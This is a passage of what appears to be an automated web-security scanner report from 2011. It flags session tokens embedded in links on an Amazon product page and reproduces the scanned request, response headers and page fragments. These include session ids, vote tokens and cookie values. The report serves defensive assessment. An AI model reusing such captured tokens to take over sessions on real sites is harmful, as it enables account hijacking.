<a class="dpSprite s_addToCart " href="/gp/item-dispatch/ref=acc_glance_t_ai_BST_atc_6?ie=UTF8&quantity.1=1&asin.1=B002DPVAWW&offeringID.1=S7HZPe8%252B15O23zcf8ATavWOISw5yOv5Qx%252FHzP6dOxT00OMpphlpr3bFP62fUNa0YQl4VDvmbo0BDGdYG5%252Bn7tvUNZPCfsI0M%252BAlxkltb%252BMO7TFTdxXi2cmee6qstT89j%252BtV4KX%252FSvqKLBTOklxhrLA%253D%253D&action=addToCart&session-id=176-7245636-0301444" id="acc_cartadd_button_B002DPVAWW" ><span>
...[SNIP]...
</span><a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R41LO7UN11ZK2/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=110D03D592568CCC2645B836D1FE534FD2AB2EE6&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMzdVVDFMWS9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmaXNTUkFkbWluPQ&voteAnchorName=R41LO7UN11ZK2.2115.Helpful.Reviews&voteSessionID=176-7245636-0301444"><span class="cmtySprite s_largeYes " >
...[SNIP]...
</a>
<a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R41LO7UN11ZK2/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=F9E4FC2F330A125F9BEC925FDF9B545CB94E2AE9&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMzdVVDFMWS9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmaXNTUkFkbWluPQ&voteAnchorName=R41LO7UN11ZK2.2115.Helpful.Reviews&voteSessionID=176-7245636-0301444"><span class="cmtySprite s_largeNo " >
...[SNIP]...
<nobr><a rel="nofollow" class="reportingButton" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R41LO7UN11ZK2/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=2632FAA0EF944C7D3FD85985089887E0EA069878&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMzdVVDFMWS9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmaXNTUkFkbWluPQ&voteAnchorName=R41LO7UN11ZK2.2115.Inappropriate.Reviews&voteSessionID=176-7245636-0301444"
>
Report abuse</a>
...[SNIP]...
</span><a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R2G1YNO8TYSTFG/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=716046978E703253E84668EF4520AD74C3A477CE&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMzdVVDFMWS9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmaXNTUkFkbWluPQ&voteAnchorName=R2G1YNO8TYSTFG.2115.Helpful.Reviews&voteSessionID=176-7245636-0301444"><span class="cmtySprite s_largeYes " >
...[SNIP]...
</a>
<a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R2G1YNO8TYSTFG/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=952A55443DE535C674144B4B50975586C564AF63&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMzdVVDFMWS9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmaXNTUkFkbWluPQ&voteAnchorName=R2G1YNO8TYSTFG.2115.Helpful.Reviews&voteSessionID=176-7245636-0301444"><span class="cmtySprite s_largeNo " >
...[SNIP]...
<nobr><a rel="nofollow" class="reportingButton" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R2G1YNO8TYSTFG/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=130B144A4B8E0EE043FCE0F577C0134E680EF73C&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMzdVVDFMWS9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmaXNTUkFkbWluPQ&voteAnchorName=R2G1YNO8TYSTFG.2115.Inappropriate.Reviews&voteSessionID=176-7245636-0301444"
>
Report abuse</a>
...[SNIP]...
</span><a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/RXL9X3C3UMYJ8/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=71D4F57801B78A8A0E759AA065E26598CA7062F1&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMzdVVDFMWS9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmaXNTUkFkbWluPQ&voteAnchorName=RXL9X3C3UMYJ8.2115.Helpful.Reviews&voteSessionID=176-7245636-0301444"><span class="cmtySprite s_largeYes " >
...[SNIP]...
</a>
<a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/RXL9X3C3UMYJ8/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=19E386ED73EE38C637913A60DBBA7BA7DE3D291C&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMzdVVDFMWS9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmaXNTUkFkbWluPQ&voteAnchorName=RXL9X3C3UMYJ8.2115.Helpful.Reviews&voteSessionID=176-7245636-0301444"><span class="cmtySprite s_largeNo " >
...[SNIP]...
<nobr><a rel="nofollow" class="reportingButton" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/RXL9X3C3UMYJ8/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=BECF36648BA15CC8223E604717807B1C208163DE&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMzdVVDFMWS9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmaXNTUkFkbWluPQ&voteAnchorName=RXL9X3C3UMYJ8.2115.Inappropriate.Reviews&voteSessionID=176-7245636-0301444"
>
Report abuse</a>
...[SNIP]...
<li><a href="/gp/redirect.html/ref=gw_m_b_ir/176-7245636-0301444?ie=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-irhome%26c%3D97664&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C&_encoding=UTF8">Investor Relations</a>
...[SNIP]...
<li><a href="/gp/redirect.html/ref=gw_m_b_pr/176-7245636-0301444?ie=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-mediaHome%26c%3D176060&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C&_encoding=UTF8">Press Releases</a>
...[SNIP]...
<li><a href="/gp/redirect.html/176-7245636-0301444?ie=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fsell-on-amazon.htm%3Fld%3DAZFSSOA&token=1E60AB4AC0ECCA00151B45353E21782E539DC601&_encoding=UTF8">Sell on Amazon</a>
...[SNIP]...
<li><a href="/gp/redirect.html/176-7245636-0301444?ie=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fproduct-ads-on-amazon.htm%3Fld%3DAZPADSFooter&token=1E60AB4AC0ECCA00151B45353E21782E539DC601&_encoding=UTF8">Advertise Your Products</a>
...[SNIP]...

9.75. http://www.amazon.com/gp/product/0596804946

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.amazon.com
Path:   /gp/product/0596804946

Issue detail

The response contains the following links that appear to contain session tokens:
  • http://www.amazon.com/gp/redirect.html/177-3345764-3077262?ie=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fproduct-ads-on-amazon.htm%3Fld%3DAZPADSFooter&token=1E60AB4AC0ECCA00151B45353E21782E539DC601&_encoding=UTF8
  • http://www.amazon.com/gp/redirect.html/177-3345764-3077262?ie=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fsell-on-amazon.htm%3Fld%3DAZFSSOA&token=1E60AB4AC0ECCA00151B45353E21782E539DC601&_encoding=UTF8
  • http://www.amazon.com/gp/redirect.html/ref=cm_sw_cl_fa_dp_KHTpnb1MYAATD?token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1&location=http%3A%2F%2Fwww.facebook.com%2Fshare.php%3Fu%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2F0596804946%2Fref%3Dcm_sw_r_fa_dp_KHTpnb1MYAATD%26bodytext%3DUsing%2520Joomla%253A%2520Building%2520Powerful%2520and%2520Efficient%2520Web%2520Sites%2520by%2520Ron%2520Severdia
  • http://www.amazon.com/gp/redirect.html/ref=cm_sw_cl_tw_dp_KHTpnb1MYAATD?token=7A1A4AE8F6CE0BD277D8295E58702D283F329C0F&location=http%3A%2F%2Ftwitter.com%2Fshare%3Foriginal_referer%3Dhttp%253A%252F%252Fwww.amazon.com%252Fgp%252Fproduct%252F0596804946%252Fref%253Dcm_sw_r_tw_dp_KHTpnb1MYAATD%26related%3Damazondeals%2Camazonmp3%26via%3Damazon%26text%3DUsing%2520Joomla%253A%2520Building%2520Powerful%2520and%2520Efficient%2520Web%2520Sites%2520by%2520Ron%2520Severdia%26url%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2F0596804946%2Fref%3Dcm_sw_r_tw_dp_KHTpnb1MYAATD%26count%3Dnone
  • http://www.amazon.com/gp/redirect.html/ref=gw_m_b_ir/177-3345764-3077262?ie=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-irhome%26c%3D97664&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C&_encoding=UTF8
  • http://www.amazon.com/gp/redirect.html/ref=gw_m_b_pr/177-3345764-3077262?ie=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-mediaHome%26c%3D176060&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C&_encoding=UTF8
  • http://www.amazon.com/gp/voting/cast/Reviews/2115/R1Y1OWU5QLKEDW/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=35F837CE6A4A6E859602EA40BAE71483DF888D59&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDU5NjgwNDk0Ni9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZ0YWc9c2V2ZXJkaWEtMjAmbGlua0NvZGU9YXMyJmNhbXA9MTc4OSZpc1NSQWRtaW49JmNyZWF0aXZlPTM5MDk1NyZjcmVhdGl2ZUFTSU49MDU5NjgwNDk0Ng&voteAnchorName=R1Y1OWU5QLKEDW.2115.Helpful.Reviews&voteSessionID=177-3345764-3077262
  • http://www.amazon.com/gp/voting/cast/Reviews/2115/R1Y1OWU5QLKEDW/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=FAEFC007CD906A1135DEEFB4221AF4A92143F667&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDU5NjgwNDk0Ni9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZ0YWc9c2V2ZXJkaWEtMjAmbGlua0NvZGU9YXMyJmNhbXA9MTc4OSZpc1NSQWRtaW49JmNyZWF0aXZlPTM5MDk1NyZjcmVhdGl2ZUFTSU49MDU5NjgwNDk0Ng&voteAnchorName=R1Y1OWU5QLKEDW.2115.Helpful.Reviews&voteSessionID=177-3345764-3077262
  • http://www.amazon.com/gp/voting/cast/Reviews/2115/R1Y1OWU5QLKEDW/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=3E90852F7C987E7C7C3E29BC2509EEF654E678BB&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDU5NjgwNDk0Ni9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZ0YWc9c2V2ZXJkaWEtMjAmbGlua0NvZGU9YXMyJmNhbXA9MTc4OSZpc1NSQWRtaW49JmNyZWF0aXZlPTM5MDk1NyZjcmVhdGl2ZUFTSU49MDU5NjgwNDk0Ng&voteAnchorName=R1Y1OWU5QLKEDW.2115.Inappropriate.Reviews&voteSessionID=177-3345764-3077262
  • http://www.amazon.com/gp/voting/cast/Reviews/2115/R25FEN55WP7HQC/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=25451DA5C23F5B316D3A335FB3C804869B4E0FFA&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDU5NjgwNDk0Ni9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZ0YWc9c2V2ZXJkaWEtMjAmbGlua0NvZGU9YXMyJmNhbXA9MTc4OSZpc1NSQWRtaW49JmNyZWF0aXZlPTM5MDk1NyZjcmVhdGl2ZUFTSU49MDU5NjgwNDk0Ng&voteAnchorName=R25FEN55WP7HQC.2115.Helpful.Reviews&voteSessionID=177-3345764-3077262
  • http://www.amazon.com/gp/voting/cast/Reviews/2115/R25FEN55WP7HQC/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=EE94A791FB5FB132C3B5C33888C786B38F0F1FC8&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDU5NjgwNDk0Ni9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZ0YWc9c2V2ZXJkaWEtMjAmbGlua0NvZGU9YXMyJmNhbXA9MTc4OSZpc1NSQWRtaW49JmNyZWF0aXZlPTM5MDk1NyZjcmVhdGl2ZUFTSU49MDU5NjgwNDk0Ng&voteAnchorName=R25FEN55WP7HQC.2115.Helpful.Reviews&voteSessionID=177-3345764-3077262
  • http://www.amazon.com/gp/voting/cast/Reviews/2115/R25FEN55WP7HQC/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=FB92B3DE8E4F4F18F8BE9C3CA93BF9BA79E68E49&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDU5NjgwNDk0Ni9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZ0YWc9c2V2ZXJkaWEtMjAmbGlua0NvZGU9YXMyJmNhbXA9MTc4OSZpc1NSQWRtaW49JmNyZWF0aXZlPTM5MDk1NyZjcmVhdGl2ZUFTSU49MDU5NjgwNDk0Ng&voteAnchorName=R25FEN55WP7HQC.2115.Inappropriate.Reviews&voteSessionID=177-3345764-3077262
  • http://www.amazon.com/gp/voting/cast/Reviews/2115/R2IK5YS84M0HC7/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=5F3E7F5CFA2EC2F433A2208CF1964F269FCC5A2A&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDU5NjgwNDk0Ni9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZ0YWc9c2V2ZXJkaWEtMjAmbGlua0NvZGU9YXMyJmNhbXA9MTc4OSZpc1NSQWRtaW49JmNyZWF0aXZlPTM5MDk1NyZjcmVhdGl2ZUFTSU49MDU5NjgwNDk0Ng&voteAnchorName=R2IK5YS84M0HC7.2115.Helpful.Reviews&voteSessionID=177-3345764-3077262
  • http://www.amazon.com/gp/voting/cast/Reviews/2115/R2IK5YS84M0HC7/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=6607021FC2D22DB19BB0449250695412ABC6A9B2&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDU5NjgwNDk0Ni9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZ0YWc9c2V2ZXJkaWEtMjAmbGlua0NvZGU9YXMyJmNhbXA9MTc4OSZpc1NSQWRtaW49JmNyZWF0aXZlPTM5MDk1NyZjcmVhdGl2ZUFTSU49MDU5NjgwNDk0Ng&voteAnchorName=R2IK5YS84M0HC7.2115.Helpful.Reviews&voteSessionID=177-3345764-3077262
  • http://www.amazon.com/gp/voting/cast/Reviews/2115/R2IK5YS84M0HC7/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=406953D9E36D6667D076AC42AC86C19631D97900&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDU5NjgwNDk0Ni9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZ0YWc9c2V2ZXJkaWEtMjAmbGlua0NvZGU9YXMyJmNhbXA9MTc4OSZpc1NSQWRtaW49JmNyZWF0aXZlPTM5MDk1NyZjcmVhdGl2ZUFTSU49MDU5NjgwNDk0Ng&voteAnchorName=R2IK5YS84M0HC7.2115.Inappropriate.Reviews&voteSessionID=177-3345764-3077262

Request

GET /gp/product/0596804946?ie=UTF8&tag=severdia-20&linkCode=as2&camp=1789&creative=390957&creativeASIN=0596804946 HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 14:04:19 GMT
Server: Server
x-amz-id-1: 1GMNYJAKA4TJD7BE20PT
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: rRZgZjI7evzN2uK+PGBNvEWrhG1Qajm2TBox690BsTrGBbLn0XvjcMMT1QA/Cp32
Vary: Accept-Encoding,User-Agent
nnCoection: close
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=177-3345764-3077262; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: UserPref=1eR/Gb/7VAeIWvMabpkc9WVd0hSTZUbBg6Yo0T7TCpNQeuSuXtGxH2kY6bTAbin+sFXFOKV5+ocOk7K3+MvDkq0/b9bHz0ODJNpZCfzlXrKaMkf2mByUw4O7H6y0HxLzB0zDpXYjvDZIG9tAgupLtlSzvaVuVoeT9Dw57HxRkT1qFd69t1G9yhJCF1dMGn6BtkhaXaKQIwqLrzarx2jcK/uWu/DYGLfPjmFfwQeqDQqf1Pu2Z67u5nMckQSNU+AXG+4uuNDdjSW4U7/7jDdJMbrRu9ZM6nSR6im5LlC77EvTc5TQz8tq18VhoFQQ90njlOAwxtXq+PDB/vmIDD+i66lzV9/NoXGIbcoNaqBVAhvyZOIdxNL/NLFlkx8w8BdoJeoQup2Vg9OErw1DYhMF9610T7Jg13XTgsW4sfARA2h+TBwY5xsP9yVw1aDK1Hh6; path=/; domain=.amazon.com; expires=Tue Feb 01 14:04:19 2011 GMT
Content-Length: 407243


<html>
<head>


<style type="text/css"><!--


BODY { font-
...[SNIP]...
</a>
<a href="/gp/redirect.html/ref=cm_sw_cl_fa_dp_KHTpnb1MYAATD?token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1&amp;location=http%3A%2F%2Fwww.facebook.com%2Fshare.php%3Fu%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2F0596804946%2Fref%3Dcm_sw_r_fa_dp_KHTpnb1MYAATD%26bodytext%3DUsing%2520Joomla%253A%2520Building%2520Powerful%2520and%2520Efficient%2520Web%2520Sites%2520by%2520Ron%2520Severdia" target="_blank" onclick="window.open('/gp/redirect.html/ref=cm_sw_cl_fa_dp_KHTpnb1MYAATD?token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1&location=http%3A%2F%2Fwww.facebook.com%2Fshare.php%3Fu%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2F0596804946%2Fref%3Dcm_sw_r_fa_dp_KHTpnb1MYAATD%26bodytext%3DUsing%2520Joomla%253A%2520Building%2520Powerful%2520and%2520Efficient%2520Web%2520Sites%2520by%2520Ron%2520Severdia', '_blank', 'location=yes,width=700,height=400');return false;"><span class="tafSocialButton" style="background-position: 0 -1px; height: 15px; width: 15px;">
...[SNIP]...
</a><a href="/gp/redirect.html/ref=cm_sw_cl_tw_dp_KHTpnb1MYAATD?token=7A1A4AE8F6CE0BD277D8295E58702D283F329C0F&amp;location=http%3A%2F%2Ftwitter.com%2Fshare%3Foriginal_referer%3Dhttp%253A%252F%252Fwww.amazon.com%252Fgp%252Fproduct%252F0596804946%252Fref%253Dcm_sw_r_tw_dp_KHTpnb1MYAATD%26related%3Damazondeals%2Camazonmp3%26via%3Damazon%26text%3DUsing%2520Joomla%253A%2520Building%2520Powerful%2520and%2520Efficient%2520Web%2520Sites%2520by%2520Ron%2520Severdia%26url%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2F0596804946%2Fref%3Dcm_sw_r_tw_dp_KHTpnb1MYAATD%26count%3Dnone" target="_blank" onclick="window.open('/gp/redirect.html/ref=cm_sw_cl_tw_dp_KHTpnb1MYAATD?token=7A1A4AE8F6CE0BD277D8295E58702D283F329C0F&location=http%3A%2F%2Ftwitter.com%2Fshare%3Foriginal_referer%3Dhttp%253A%252F%252Fwww.amazon.com%252Fgp%252Fproduct%252F0596804946%252Fref%253Dcm_sw_r_tw_dp_KHTpnb1MYAATD%26related%3Damazondeals%2Camazonmp3%26via%3Damazon%26text%3DUsing%2520Joomla%253A%2520Building%2520Powerful%2520and%2520Efficient%2520Web%2520Sites%2520by%2520Ron%2520Severdia%26url%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2F0596804946%2Fref%3Dcm_sw_r_tw_dp_KHTpnb1MYAATD%26count%3Dnone', '_blank', 'location=yes,width=700,height=400');return false;"><span class="tafSocialButton" style="background-position: -15px -1px; height: 15px; width: 15px;">
...[SNIP]...
</span><a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R2IK5YS84M0HC7/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=6607021FC2D22DB19BB0449250695412ABC6A9B2&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDU5NjgwNDk0Ni9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZ0YWc9c2V2ZXJkaWEtMjAmbGlua0NvZGU9YXMyJmNhbXA9MTc4OSZpc1NSQWRtaW49JmNyZWF0aXZlPTM5MDk1NyZjcmVhdGl2ZUFTSU49MDU5NjgwNDk0Ng&voteAnchorName=R2IK5YS84M0HC7.2115.Helpful.Reviews&voteSessionID=177-3345764-3077262"><span class="cmtySprite s_largeYes " >
...[SNIP]...
</a>
<a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R2IK5YS84M0HC7/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=5F3E7F5CFA2EC2F433A2208CF1964F269FCC5A2A&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDU5NjgwNDk0Ni9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZ0YWc9c2V2ZXJkaWEtMjAmbGlua0NvZGU9YXMyJmNhbXA9MTc4OSZpc1NSQWRtaW49JmNyZWF0aXZlPTM5MDk1NyZjcmVhdGl2ZUFTSU49MDU5NjgwNDk0Ng&voteAnchorName=R2IK5YS84M0HC7.2115.Helpful.Reviews&voteSessionID=177-3345764-3077262"><span class="cmtySprite s_largeNo " >
...[SNIP]...
<nobr><a rel="nofollow" class="reportingButton" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R2IK5YS84M0HC7/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=406953D9E36D6667D076AC42AC86C19631D97900&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDU5NjgwNDk0Ni9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZ0YWc9c2V2ZXJkaWEtMjAmbGlua0NvZGU9YXMyJmNhbXA9MTc4OSZpc1NSQWRtaW49JmNyZWF0aXZlPTM5MDk1NyZjcmVhdGl2ZUFTSU49MDU5NjgwNDk0Ng&voteAnchorName=R2IK5YS84M0HC7.2115.Inappropriate.Reviews&voteSessionID=177-3345764-3077262"
>
Report abuse</a>
...[SNIP]...
</span><a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R25FEN55WP7HQC/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=EE94A791FB5FB132C3B5C33888C786B38F0F1FC8&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDU5NjgwNDk0Ni9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZ0YWc9c2V2ZXJkaWEtMjAmbGlua0NvZGU9YXMyJmNhbXA9MTc4OSZpc1NSQWRtaW49JmNyZWF0aXZlPTM5MDk1NyZjcmVhdGl2ZUFTSU49MDU5NjgwNDk0Ng&voteAnchorName=R25FEN55WP7HQC.2115.Helpful.Reviews&voteSessionID=177-3345764-3077262"><span class="cmtySprite s_largeYes " >
...[SNIP]...
</a>
<a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R25FEN55WP7HQC/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=25451DA5C23F5B316D3A335FB3C804869B4E0FFA&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDU5NjgwNDk0Ni9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZ0YWc9c2V2ZXJkaWEtMjAmbGlua0NvZGU9YXMyJmNhbXA9MTc4OSZpc1NSQWRtaW49JmNyZWF0aXZlPTM5MDk1NyZjcmVhdGl2ZUFTSU49MDU5NjgwNDk0Ng&voteAnchorName=R25FEN55WP7HQC.2115.Helpful.Reviews&voteSessionID=177-3345764-3077262"><span class="cmtySprite s_largeNo " >
...[SNIP]...
<nobr><a rel="nofollow" class="reportingButton" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R25FEN55WP7HQC/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=FB92B3DE8E4F4F18F8BE9C3CA93BF9BA79E68E49&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDU5NjgwNDk0Ni9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZ0YWc9c2V2ZXJkaWEtMjAmbGlua0NvZGU9YXMyJmNhbXA9MTc4OSZpc1NSQWRtaW49JmNyZWF0aXZlPTM5MDk1NyZjcmVhdGl2ZUFTSU49MDU5NjgwNDk0Ng&voteAnchorName=R25FEN55WP7HQC.2115.Inappropriate.Reviews&voteSessionID=177-3345764-3077262"
>
Report abuse</a>
...[SNIP]...
</span><a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R1Y1OWU5QLKEDW/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=FAEFC007CD906A1135DEEFB4221AF4A92143F667&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDU5NjgwNDk0Ni9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZ0YWc9c2V2ZXJkaWEtMjAmbGlua0NvZGU9YXMyJmNhbXA9MTc4OSZpc1NSQWRtaW49JmNyZWF0aXZlPTM5MDk1NyZjcmVhdGl2ZUFTSU49MDU5NjgwNDk0Ng&voteAnchorName=R1Y1OWU5QLKEDW.2115.Helpful.Reviews&voteSessionID=177-3345764-3077262"><span class="cmtySprite s_largeYes " >
...[SNIP]...
</a>
<a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R1Y1OWU5QLKEDW/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=35F837CE6A4A6E859602EA40BAE71483DF888D59&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDU5NjgwNDk0Ni9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZ0YWc9c2V2ZXJkaWEtMjAmbGlua0NvZGU9YXMyJmNhbXA9MTc4OSZpc1NSQWRtaW49JmNyZWF0aXZlPTM5MDk1NyZjcmVhdGl2ZUFTSU49MDU5NjgwNDk0Ng&voteAnchorName=R1Y1OWU5QLKEDW.2115.Helpful.Reviews&voteSessionID=177-3345764-3077262"><span class="cmtySprite s_largeNo " >
...[SNIP]...
